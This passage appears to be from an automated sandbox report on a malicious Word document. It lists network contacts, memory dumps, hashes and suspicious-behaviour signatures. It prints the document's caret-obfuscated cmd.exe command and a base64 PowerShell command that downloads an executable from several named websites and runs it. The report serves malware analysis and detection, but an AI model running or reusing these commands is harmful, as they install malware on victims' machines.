^ 8^ 3^ ^ 4^1^ 4^5^ ^ 60 ^ ^ ^ 22 ^ ^ 3 ^5^2 ^4^5 ^ ^3 ^0^ ^4^5 ^6^0^ ^ ^ 46 ^ ^ ^3^ 7^ 67 ^ ^ 3^ ^ 6^8 ^3^ 6^0 2^3 ^ ^3^ 5^2 4^1^ ^3 ^0 ^ 4^5^ ^60^ 47 ^3^ ^7 ^ ^ ^ ^3^7 ^ ^ ^3^ 0 ^ ^ ^ ^4^5 ^ ^ ^ 60 ^6^3^ 3^ 7^ 4^6^ ^3^ ^ ^0^ ^ 1^0 ^ ^6^0 39 ^ ^3 38^ ^4^5^ ^ ^3 1^9^ ^3 ^ ^ ^3 ^6^2^ ^ 3^ 13^ ^ 2^ 3 ^ 1^7^ 8^ ^ ^ ^60^ 3 ^ 3^ ^7 ^ ^ ^45^ ^ ^ 3^ 2^6 3 60^ 59^ ^ 3^ ^ 52 ^ 3 ^3^ ^1^7 ^ 45^ ^ ^ ^3 2^2^ 3 4^2 ^ ^ ^ ^37^ ^ ^ 3 4^1^ 10^ ^ 6^0^ ^ ^ ^ 48^ ^ 3^ ^ ^ 7^ 3^8 ^3 ^ 1^9^ 3^ ^6^0^ 4^6 3^ ^7 ^6^5^ ^3^ ^ ^1^9^ ^ ^ ^4^5^ ^60 ^ ^56^ 3^ 7^ 65 ^ 3 55^ ^45 ^6^0^ ^29^ 3^ ^ ^ ^ ^7^ ^ 38 ^3^ ^ ^1^9 3^ ^60^ ^4^6^ ^ ^ ^ ^3^ ^ ^52 ^ ^8 ^3 ^19^ ^ 10^ ^6^0^ ^6^3 3^ ^ 52 6^7^ ^3^ ^ ^ 19^ ^ ^ ^4^5^ ^ ^ ^60 ^ ^ ^ 3^6^ ^ ^ ^3 ^ ^ 7^ ^ 5^9^ ^3^ 6^8 ^ ^ 8 6^0 32^ ^ ^3^ ^ ^52^ ^ ^8^ ^3 ^0 ^ ^45 60^ ^47 ^ 3^ 7^ 37^ 3 ^1^9 ^ ^8^ ^3^ 2^2^ 3^ ^ 1^3 ^ ^ 65^ 3^ ^ 2^5 ^ ^8^ ^ ^ ^ 60^ ^ 31 ^3 ^ ^7^ ^ ^ ^3^7^ ^3^ ^8 3 ^60 4^8 ^ 3^ ^52 ^ ^8 ^3^ 2^6 ^3 ^6^0 ^1^0 3 ^13^ 4^8 3 0 ^1^0 ^ 3 22 ^ ^ ^ 3^ ^ ^ 52 ^8^ ^ 3 1^6^ ^3^ 6^0^ 23^ 3^ ^5^2 ^ ^3 3 ^55 ^ 45^ ^60 2^3^ ^ ^ ^3 ^ 52 ^ ^ ^2^ ^3^ ^ ^68^ ^ 8^ 60 ^ ^3^2 3 ^5^2 ^ 8^ 3 ^ 41^ ^8^ 60 ^ ^5^9 ^ ^3 ^ ^7^ ^ ^ ^ ^12^ ^ ^ ^3^ 19 10^ ^ ^ ^6^0 3^2 ^ ^3 5^2 ^ ^ ^2^ ^3^ 2^6^ ^3 ^ 6^0 ^ 3^6 ^ 3^ ^ ^7^ ^55 ^ 3 ^68 ^ ^ ^8^ 3 ^32 ^ ^3^ ^7 ^2^ ^ 3 1^9^ ^ ^ ^ 10^ ^60^ ^ ^20 ^ 3^ ^ ^ ^4^2^ ^3^7 3 ^5^1 45 3 ^63 ^3^ ^ ^7 59 ^ ^ ^3^ ^64^ 3^ ^ 6^0 ^ 1^5^ 3^ ^ ^ 38 ^ ^ ^1^2 ^ ^3 ^5^8 ^1^0^ ^ ^6^0^ ^ ^6^7^ ^ 3^ ^ ^ ^3^8^ ^3^ ^ 3 ^16 ^ ^3 ^ ^ 6^0^ ^ 59^ ^ ^ 3 ^ ^ ^52 ^ ^8^ ^3 ^5^5 3 3^ ^27 ^3 42^ ^ ^37 ^3^ ^0^ ^ 1^0^ 60^ ^ ^12 ^3 ^ ^7^ ^65^ ^3^ 1^9 ^ ^ ^8 ^6^0^ ^ ^ 22^ ^3^ ^ ^ 42^ 66 ^ ^ ^ ^3 ^ ^ 34 ^8^ ^ 3^ ^6^6^ ^ ^3^ ^ ^ ^7 ^ ^ ^12 ^ ^3 ^1^9^ 4^5^ 60^ ^11 ^3 ^ ^ ^7 3^8^ ^3^ 4^1 8^ ^ ^60 ^ ^5^9 3^ ^ ^4^2^ ^6^6 ^ ^ 3 ^ ^41^ 10^ ^6^0 ^ ^2^2 ^3^ ^ ^7 5^9^ ^ 3 ^ 0^ ^10^ 6^0 ^ 59 ^ ^ ^ 3 ^ ^ 52^ ^ ^ ^6^5^ 3^ ^25^ 10 60^ ^ ^ 17 3^ ^ ^ 1^3 ^4^1^ ^ ^ ^ 3^ 25^ ^4^5 ^60 ^58 ^3 4^2^ 55 ^ 3 ^ ^0^ 4^5^ 6^0 ^ ^5^8^ 3^ ^ ^ 52 3 ^ ^3 ^ ^ ^19 ^ ^ 3 ^60^ 61^ 3 5^2 8^ ^ ^ ^3 ^2^1 ^ ^3^ ^3 ^ ^ ^ ^5^6^ ^ 3 3^8^ ^ ^ 3 3 ^ ^53 1^0^ 3^ ^61^ ^ 3 ^13^ 4^6 ^ ^ ^3^ 53^ ^ 3 ^6^0 ^ ^6^0^ 3 ^ 7^ ^6^6^ ^3 ^ 1^4 ^ 3^ ^ ^ 3 45^ ^3^ ^ ^ ^ ^13^ ^ ^ ^ 59^ ^ ^3 ^67 ^3^ ^3^ ^56 3^ 13 6^7^ ^ ^ 3^ ^ ^ ^2 3 ^3^ ^ 11^ 3^ ^4^2 ^5^5 ^ 3^ ^ 1^7^ ^ ^ ^1^0^ ^ ^3^ ^ 1^2^ ^ 3 ^5^2 ^48^ ^ 3^ ^58^ ^ ^ 4^5 60 ^68^ ^ ^ 3 1^3 ^ ^5^9^ ^3^ ^ ^ ^ 53^ ^ 3^ ^ ^ 6^0^ ^23^ ^ ^ ^3^ ^ 7^ ^ 6^6 3 ^ 2^6^ 4^5 ^3 2^7 ^3 52 ^ ^3 ^3^ ^26^ ^8^ ^6^0^ 2^9 3^ ^ 7 ^ ^ ^ 10^ ^ 3 ^16^ ^ ^8 ^6^0 47^ 3 ^ ^4^2^ 46^ ^ ^ ^ 3 ^53 10 6^0^ ^5^5 ^3^ 4^2^ ^ 55^ 3 2^1 ^ ^1^0^ ^ ^3 ^ 1^2 3^ 3^8 ^ 3^8 3^ ^ ^ 19^ ^45 60 ^ ^6^7 3^ 4^2 ^ ^46 ^ ^ ^3 ^5^3 ^ ^ ^10 3 ^ ^ ^ ^3^2 3 ^ 7 ^65 ^ ^ ^3 ^57^ 3 6^0^ ^2^3^ ^3^ ^42 ^ ^5^5^ 3 ^ ^ ^1^7 10^ ^ ^ ^6^0^ ^ 4^3 3 7 ^ 37 ^3 ^ ^5^5 ^45 ^6^0 ^ ^ ^ ^2^3^ ^ ^3 ^7^ ^ ^38^ 3^ ^ ^4^1 10 60^ ^ ^4^8 ^3 ^42^ 4^5^ ^3^ ^ 53 3 ^ 6^0 ^ 61^ ^3 ^ ^18 45^ 3 1^6^ ^ 1^0 ^ ^3^ ^45^ ^ ^ ^3^ ^ ^ ^ ^7 ^ 12 ^ 3 ^ ^1^9^ ^ ^ ^4^5^ ^3 ^4^5 3 ^42^ 8 ^ ^ 3 ^ ^ 57 45 6^0^ ^ ^6^8^ 3^ ^7^ ^ 48 ^3^ ^21 ^ ^8^ 6^0 ^54^ ^3 5^2^ 8 ^ ^ 3^ ^5^5^ ^45 ^ ^ ^60 3^0 ^ ^ 3 ^5^2^ ^ ^46 3^ ^53 ^ ^ ^3 ^ 6^0^ ^15 ^ ^ ^3 3^8 48^ 3^ 5^5^ ^ ^ 3^ ^3^ ^ 3^2^ ^ ^3^ ^ ^38 ^8^ ^3 ^ ^ ^1^9^ ^ 10^ ^ 60^ ^ ^ 2^4^ 3^ ^ 7 ^6^6 ^ ^ ^ ^3^ 19 ^3 ^60 ^ ^ ^ ^22 3 7 ^ 3^8^ ^ 3^ 6^8^ ^ 3^ ^ ^ 60 ^7 ^3 ^7 ^ 12 3^ ^19^ 3^ 60 ^ 23^ ^ ^ ^3^ ^42^ 45 ^3^ ^ 5^3^ 3^ ^6^0 ^ ^6^1 ^ ^3^ ^ 1^8^ 45 3^ ^16^ ^1^0^ 3 4^6^ ^ ^ ^3 4^2^ ^ ^3^ ^ ^3 ^ ^ ^53^ ^3^ ^ ^ 6^0 ^27^ ^3^ ^3^8 ^6^6 ^3^ ^64 8^ 3 ^ 61 3^ ^ ^1^3^ ^ ^ 4^6 ^ ^ 3^ ^ 1^4^ 8 ^6^0 ^ ^3^2^ ^3 ^ ^ ^5^2 ^ ^ ^ 41 ^3^ ^ ^19 ^1^0 ^6^0^ 4^0 ^3 ^7 ^ ^ ^6^5 ^ ^3^ 0 ^ ^8 ^60^ 53 3^ ^ ^ 5^2 ^8^ ^ ^3 ^68^ 8^ 6^0 ^20 ^ 3^ 4^2^ 3^ 3^ ^ ^53 3^ ^ ^ ^60^ ^27^ ^ ^ ^3^ ^ 38 6^6^ ^3^ ^ ^6^4 ^ 8 3 ^ 5^4 ^ ^ ^3^ ^7 ^67^ ^3 ^ 5^5^ ^4^5^ ^ 60 2^3 ^ ^ 3 7^ 3^8 ^ ^3^ 16^ ^1^0^ ^ 3^ ^ ^ 5^4 3^ ^5^2 ^ 59^ ^3 ^ ^ ^ ^41 10 ^ ^6^0 36^ ^ 3^ 52^ ^8^ ^ ^3 ^41^ ^10^ ^ 6^0 ^ 48 ^ ^3^ 52 ^46 ^3 49^ ^8^ ^60 ^4^4 ^ ^ ^3^ 42^ 3^ ^3^ 67^ 3 3 45 3^ ^4^2 ^3 ^ ^3^ 6^7 ^ ^ ^ 3^ ^3 ^ ^4^5^ ^3 ^ ^4^2 3^ 3 67 ^3 ^ 3^ ^ ^4^5^ 3 4^2^ 3 3 6^7^ ^ 3^ ^ 3^ ^ ^45^ ^ ^ ^3 4^2^ 3 ^ ^ ^3 6^7^ ^ 3 ^3 ^ ^ ^ 45 ^3 ^4^2^ ^ 3 ^ 3 ^ ^ ^6^7^ 3 ^ ^3^ ^2^8 ^6^9) ^D^O S^e^T ^or^d=!^or^d!!R^0:~ %^S,1!&& ^I^f %^S G^tR ^68 C^a^l^L %^or^d:^~ ^ ^ 5% "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -e JABPAEoAcAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AFkAagA9ACcAaAB0AHQAcAA6AC8ALwBqAG8AYgBhAHIAYgBhAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AZABzAHQAZgA2AEAAaAB0AHQAcAA6AC8ALwBsAGkAZwBoAHQAYgBvAHgALgBsAGIAZABlAHYALgBjAG8ALgB1AGsALwBXAEgAbAAyADMAOQBAAGgAdAB0AHAAOgAvAC8AYwBoAGEAbABsAGUAbgBnAGUAcgBiAGEAbABsAHQAbwB1AHIAbgBhAG0AZQBuAHQALgBjAG8AbQAvADUARQB2AG8AQABoAHQAdABwADoALwAvAHQAaABlAHAAcgBlAHMAZQBuAHQAYQB0AGkAbwBuAHMAdABhAGcAZQAuAGMAbwBtAC8AVgA1AG0AWABPAEkATwBIAEAAaAB0AHQAcAA6AC8ALwBkAGUAbQBvAC4ANQA4AGkAbgBzAGEAYQB0AC4AYwBvAG0ALwB0AHUARwBOADYARgBTACcALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABBAG4ASAAgAD0AIAAnADIAMAAzACcAOwAkAHoATgBZAD0AJABlAG4AdgA6AHAAdQBiAGwAaQBjACsAJwBcACcAKwAkAEEAbgBIACsAJwAuAGUAeABlACcAOwBmAG8AcgBlAGEAYwBoACgAJABpAFgAawAgAGkAbgAgACQAegBZAGoAKQB7AHQAcgB5AHsAJABPAEoAcAAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABpAFgAawAsACAAJAB6AE4AWQApADsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJAB6AE4AWQA7AGIAcgBlAGEAawA7AH0AYwBhAHQAYwBoAHsAfQB9ACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA=

Network

Country Destination Domain Proto
US 8.8.8.8:53 jobarba.com udp
US 13.248.169.48:80 jobarba.com tcp
US 8.8.8.8:53 lightbox.lbdev.co.uk udp
GB 52.56.73.24:80 lightbox.lbdev.co.uk tcp

Files

memory/2892-0-0x000000002FDC1000-0x000000002FDC2000-memory.dmp

memory/2892-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2892-2-0x0000000070F2D000-0x0000000070F38000-memory.dmp

memory/2892-6-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-48-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-61-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-84-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-83-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-60-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-49-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-28-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-27-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-26-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-25-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-23-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-22-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-21-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-20-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-19-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-18-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-17-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-16-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-15-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-14-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-13-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-189-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-24-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-12-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-11-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-10-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-9-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-8-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-7-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-444-0x0000000070F2D000-0x0000000070F38000-memory.dmp

memory/2892-445-0x00000000007F0000-0x00000000008F0000-memory.dmp

memory/2892-446-0x00000000007F0000-0x00000000008F0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 6e60efec1250687d8a262999115b8282
SHA1 604551eed151b98427db1460d5ca4cba35371f93
SHA256 1cefe170c07e82779871f8f18cea6018fb54166a2003818d98d15e97bb0de7b9
SHA512 9c13bf8e22638bc6d673523b66f086701844d12e26a2f8c39897d7b0d59e0d5b1a349cdd11f82ed6287664699d4f801a078bf368225cef4dad18583a85b7681d

memory/2892-462-0x0000000070F2D000-0x0000000070F38000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-25 15:26

Reported

2024-05-25 15:30

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7269c689963f7c860ec3fba9bfad48b6_JaffaCakes118.doc" /o ""

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process N/A C:\Windows\System32\cmd.exe C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7269c689963f7c860ec3fba9bfad48b6_JaffaCakes118.doc" /o ""

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /V^:^oN^ /c "^se^T ^ ^ ^ R^0=^LF^M^A^z^K^P^G^Q^Sw^zkDS^P^aOFb^tKvl^3R^d^6=^i^5^2^u-N^q^h8^E^Xr^YCm9^gs^jo^f^ VHJ7cneT^0^Bp^y^1^W^U^4IZ&&^FOR %^S ^IN ( 6^1^ 48^ ^ ^1^0^ 57^ ^40 ^4^6 ^ ^ ^36^ ^ ^5^7^ ^23 2^3 ^ 50^ ^3^3 ^57 50 53^ ^ ^3^ 60 ^ ^ ^15 3^ ^ ^ ^3^8^ ^ ^48 ^ ^3 55^ ^3^ ^3 ^ ^4^4 ^3 ^7 ^ 66^ ^3^ ^68^ 8 6^0^ 2^4^ 3^ ^4^2 5^9 ^ ^ 3 ^ ^1^9^ 10^ ^ ^60^ ^ ^ 29 ^ ^3 ^ ^ 7^ ^ ^ 48^ ^ 3^ ^68 ^8^ 60 47 ^ 3^ ^ ^5^2^ ^ ^ 8 3^ ^6^7 ^ 3 ^60 1^7 ^ ^ ^ ^3 ^7^ ^6^5 ^3^ ^ ^2^6 ^ ^3 ^ ^ 3 ^ ^ 3^2^ ^ 3 ^ ^18^ ^ 55^ 3^ ^ ^ 6^8 8^ 6^0^ ^ ^2^9 ^ ^ 3 38 ^ 2^ 3 1^9^ ^ ^ 3^ ^ 60 6^1 3^ ^ 7 ^6^5^ 3 ^19 4^5 60 ^ 59 ^ 3^ ^ ^1^3 ^46^ ^3^ ^ 5^3^ 3 ^60^ ^ 2^7 ^ ^ ^3 ^18^ 12^ 3 ^ ^1^6 ^ ^45^ ^ 3^ ^44^ ^3^ ^4^2^ ^ 55^ 3 ^ ^ 1^6^ ^3 ^ 60^ 59^ 3 52 ^ ^ 8^ 3^ 55 ^3 ^ ^3^ ^27^ ^ ^ ^3 4^2 3^7^ ^3^ ^0 1^0 ^ 6^0^ ^35 ^ ^ ^3^ ^ ^7^ ^3^7^ 3 ^ ^ 4^1^ 4^5^ ^60 ^ ^ 3^6 ^3^ 5^2^ ^67^ ^3 ^4^1 45 6^0^ ^36 ^3^ ^ 4^2^ ^ ^66 3^ ^ ^ ^4^1^ ^10^ ^60^ ^ ^22^ 3 ^7 ^ ^ 5^9 ^ 3 ^0 ^ ^ 1^0 ^60^ ^2^4 ^3^ ^ 5^2 3^ 3 ^ ^ 0^ 8 ^ 60^ ^47 ^ ^3 ^ 7 ^ ^37 3^ 1^9 4^5^ 6^0 ^ ^ ^ 59^ 3 ^ ^7 ^ ^ ^ ^6^5 ^ 3 ^19 ^4^5^ ^60^ ^ ^ 5^9^ ^ 3 ^4^2^ 37^ ^3 ^68^ 3^ ^60^ 1^1^ 3^ ^ ^ 5^2 ^8 3^ 6^8 ^45^ ^ ^3 ^31^ ^3^ ^3^8^ 3^ 3^ 1^6^ 3 ^6^0^ ^ 59^ ^ ^3^ 5^2 ^8 ^ 3 ^5^5 3^ 3^ ^ ^ 27 3 ^ 42^ ^ ^37 ^3 ^ 0^ ^1^0 ^ ^ 6^0 ^ ^46^ ^3 ^7^ ^ 12^ 3 6^8 ^10 6^0 48 ^3^ ^ ^52 ^ 8^ 3^ ^ 4^1^ 4^5^ ^ 60 ^ ^ ^ 22 ^ ^ 3 ^5^2 ^4^5 ^ ^3 ^0^ ^4^5 ^6^0^ ^ ^ 46 ^ ^ ^3^ 7^ 67 ^ ^ 3^ ^ 6^8 ^3^ 6^0 2^3 ^ ^3^ 5^2 4^1^ ^3 ^0 ^ 4^5^ ^60^ 47 ^3^ ^7 ^ ^ ^ ^3^7 ^ ^ ^3^ 0 ^ ^ ^ ^4^5 ^ ^ ^ 60 ^6^3^ 3^ 7^ 4^6^ ^3^ ^ ^0^ ^ 1^0 ^ ^6^0 39 ^ ^3 38^ ^4^5^ ^ ^3 1^9^ ^3 ^ ^ ^3 ^6^2^ ^ 3^ 13^ ^ 2^ 3 ^ 1^7^ 8^ ^ ^ ^60^ 3 ^ 3^ ^7 ^ ^ ^45^ ^ ^ 3^ 2^6 3 60^ 59^ ^ 3^ ^ 52 ^ 3 ^3^ ^1^7 ^ 45^ ^ ^ ^3 2^2^ 3 4^2 ^ ^ ^ ^37^ ^ ^ 3 4^1^ 10^ ^ 6^0^ ^ ^ ^ 48^ ^ 3^ ^ ^ 7^ 3^8 ^3 ^ 1^9^ 3^ ^6^0^ 4^6 3^ ^7 ^6^5^ ^3^ ^ ^1^9^ ^ ^ ^4^5^ ^60 ^ ^56^ 3^ 7^ 65 ^ 3 55^ ^45 ^6^0^ ^29^ 3^ ^ ^ ^ ^7^ ^ 38 ^3^ ^ ^1^9 3^ ^60^ ^4^6^ ^ ^ ^ ^3^ ^ ^52 ^ ^8 ^3 ^19^ ^ 10^ ^6^0^ ^6^3 3^ ^ 52 6^7^ ^3^ ^ ^ 19^ ^ ^ ^4^5^ ^ ^ ^60 ^ ^ ^ 3^6^ ^ ^ ^3 ^ ^ 7^ ^ 5^9^ ^3^ 6^8 ^ ^ 8 6^0 32^ ^ ^3^ ^ ^52^ ^ ^8^ ^3 ^0 ^ ^45 60^ ^47 ^ 3^ 7^ 37^ 3 ^1^9 ^ ^8^ ^3^ 2^2^ 3^ ^ 1^3 ^ ^ 65^ 3^ ^ 2^5 ^ ^8^ ^ ^ ^ 60^ ^ 31 ^3 ^ ^7^ ^ ^ ^3^7^ ^3^ ^8 3 ^60 4^8 ^ 3^ ^52 ^ ^8 ^3^ 2^6 ^3 ^6^0 ^1^0 3 ^13^ 4^8 3 0 ^1^0 ^ 3 22 ^ ^ ^ 3^ ^ ^ 52 ^8^ ^ 3 1^6^ ^3^ 6^0^ 23^ 3^ ^5^2 ^ ^3 3 ^55 ^ 45^ ^60 2^3^ ^ ^ ^3 ^ 52 ^ ^ ^2^ ^3^ ^ ^68^ ^ 8^ 60 ^ ^3^2 3 ^5^2 ^ 8^ 3 ^ 41^ ^8^ 60 ^ ^5^9 ^ ^3 ^ ^7^ ^ ^ ^ ^12^ ^ ^ ^3^ 19 10^ ^ ^ ^6^0 3^2 ^ ^3 5^2 ^ ^ ^2^ ^3^ 2^6^ ^3 ^ 6^0 ^ 3^6 ^ 3^ ^ ^7^ ^55 ^ 3 ^68 ^ ^ ^8^ 3 ^32 ^ ^3^ ^7 ^2^ ^ 3 1^9^ ^ ^ ^ 10^ ^60^ ^ ^20 ^ 3^ ^ ^ ^4^2^ ^3^7 3 ^5^1 45 3 ^63 ^3^ ^ ^7 59 ^ ^ ^3^ ^64^ 3^ ^ 6^0 ^ 1^5^ 3^ ^ ^ 38 ^ ^ ^1^2 ^ ^3 ^5^8 ^1^0^ ^ ^6^0^ ^ ^6^7^ ^ 3^ ^ ^ ^3^8^ ^3^ ^ 3 ^16 ^ ^3 ^ ^ 6^0^ ^ 59^ ^ ^ 3 ^ ^ ^52 ^ ^8^ ^3 ^5^5 3 3^ ^27 ^3 42^ ^ ^37 ^3^ ^0^ ^ 1^0^ 60^ ^ ^12 ^3 ^ ^7^ ^65^ ^3^ 1^9 ^ ^ ^8 ^6^0^ ^ ^ 22^ ^3^ ^ ^ 42^ 66 ^ ^ ^ ^3 ^ ^ 34 ^8^ ^ 3^ ^6^6^ ^ ^3^ ^ ^ ^7 ^ ^ ^12 ^ ^3 ^1^9^ 4^5^ 60^ ^11 ^3 ^ ^ ^7 3^8^ ^3^ 4^1 8^ ^ ^60 ^ ^5^9 3^ ^ ^4^2^ ^6^6 ^ ^ 3 ^ ^41^ 10^ ^6^0 ^ ^2^2 ^3^ ^ ^7 5^9^ ^ 3 ^ 0^ ^10^ 6^0 ^ 59 ^ ^ ^ 3 ^ ^ 52^ ^ ^ ^6^5^ 3^ ^25^ 10 60^ ^ ^ 17 3^ ^ ^ 1^3 ^4^1^ ^ ^ ^ 3^ 25^ ^4^5 ^60 ^58 ^3 4^2^ 55 ^ 3 ^ ^0^ 4^5^ 6^0 ^ ^5^8^ 3^ ^ ^ 52 3 ^ ^3 ^ ^ ^19 ^ ^ 3 ^60^ 61^ 3 5^2 8^ ^ ^ ^3 ^2^1 ^ ^3^ ^3 ^ ^ ^ ^5^6^ ^ 3 3^8^ ^ ^ 3 3 ^ ^53 1^0^ 3^ ^61^ ^ 3 ^13^ 4^6 ^ ^ ^3^ 53^ ^ 3 ^6^0 ^ ^6^0^ 3 ^ 7^ ^6^6^ ^3 ^ 1^4 ^ 3^ ^ ^ 3 45^ ^3^ ^ ^ ^ ^13^ ^ ^ ^ 59^ ^ ^3 ^67 ^3^ ^3^ ^56 3^ 13 6^7^ ^ ^ 3^ ^ ^ ^2 3 ^3^ ^ 11^ 3^ ^4^2 ^5^5 ^ 3^ ^ 1^7^ ^ ^ ^1^0^ ^ ^3^ ^ 1^2^ ^ 3 ^5^2 ^48^ ^ 3^ ^58^ ^ ^ 4^5 60 ^68^ ^ ^ 3 1^3 ^ ^5^9^ ^3^ ^ ^ ^ 53^ ^ 3^ ^ ^ 6^0^ ^23^ ^ ^ ^3^ ^ 7^ ^ 6^6 3 ^ 2^6^ 4^5 ^3 2^7 ^3 52 ^ ^3 ^3^ ^26^ ^8^ ^6^0^ 2^9 3^ ^ 7 ^ ^ ^ 10^ ^ 3 ^16^ ^ ^8 ^6^0 47^ 3 ^ ^4^2^ 46^ ^ ^ ^ 3 ^53 10 6^0^ ^5^5 ^3^ 4^2^ ^ 55^ 3 2^1 ^ ^1^0^ ^ ^3 ^ 1^2 3^ 3^8 ^ 3^8 3^ ^ ^ 19^ ^45 60 ^ ^6^7 3^ 4^2 ^ ^46 ^ ^ ^3 ^5^3 ^ ^ ^10 3 ^ ^ ^ ^3^2 3 ^ 7 ^65 ^ ^ ^3 ^57^ 3 6^0^ ^2^3^ ^3^ ^42 ^ ^5^5^ 3 ^ ^ ^1^7 10^ ^ ^ ^6^0^ ^ 4^3 3 7 ^ 37 ^3 ^ ^5^5 ^45 ^6^0 ^ ^ ^ ^2^3^ ^ ^3 ^7^ ^ ^38^ 3^ ^ ^4^1 10 60^ ^ ^4^8 ^3 ^42^ 4^5^ ^3^ ^ 53 3 ^ 6^0 ^ 61^ ^3 ^ ^18 45^ 3 1^6^ ^ 1^0 ^ ^3^ ^45^ ^ ^ ^3^ ^ ^ ^ ^7 ^ 12 ^ 3 ^ ^1^9^ ^ ^ ^4^5^ ^3 ^4^5 3 ^42^ 8 ^ ^ 3 ^ ^ 57 45 6^0^ ^ ^6^8^ 3^ ^7^ ^ 48 ^3^ ^21 ^ ^8^ 6^0 ^54^ ^3 5^2^ 8 ^ ^ 3^ ^5^5^ ^45 ^ ^ ^60 3^0 ^ ^ 3 ^5^2^ ^ ^46 3^ ^53 ^ ^ ^3 ^ 6^0^ ^15 ^ ^ ^3 3^8 48^ 3^ 5^5^ ^ ^ 3^ ^3^ ^ 3^2^ ^ ^3^ ^ ^38 ^8^ ^3 ^ ^ ^1^9^ ^ 10^ ^ 60^ ^ ^ 2^4^ 3^ ^ 7 ^6^6 ^ ^ ^ ^3^ 19 ^3 ^60 ^ ^ ^ ^22 3 7 ^ 3^8^ ^ 3^ 6^8^ ^ 3^ ^ ^ 60 ^7 ^3 ^7 ^ 12 3^ ^19^ 3^ 60 ^ 23^ ^ ^ ^3^ ^42^ 45 ^3^ ^ 5^3^ 3^ ^6^0 ^ ^6^1 ^ ^3^ ^ 1^8^ 45 3^ ^16^ ^1^0^ 3 4^6^ ^ 